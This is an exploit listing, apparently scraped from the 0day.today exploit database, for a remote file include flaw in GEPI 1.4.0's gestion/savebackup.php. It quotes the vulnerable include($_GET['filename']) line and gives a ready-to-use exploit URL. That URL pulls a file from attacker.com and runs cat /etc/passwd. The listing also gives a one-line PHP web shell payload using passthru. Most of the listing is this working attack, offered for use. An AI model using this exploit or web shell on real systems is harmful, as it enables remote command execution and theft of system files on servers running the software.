[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

Author
Sumit Siddharth
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1096
Category
web applications
Date add
31-10-2006
Platform
unsorted
======================================================================
GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability
======================================================================



Package:- gepi 1.4.0

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id



#  0day.today [2024-11-16]  #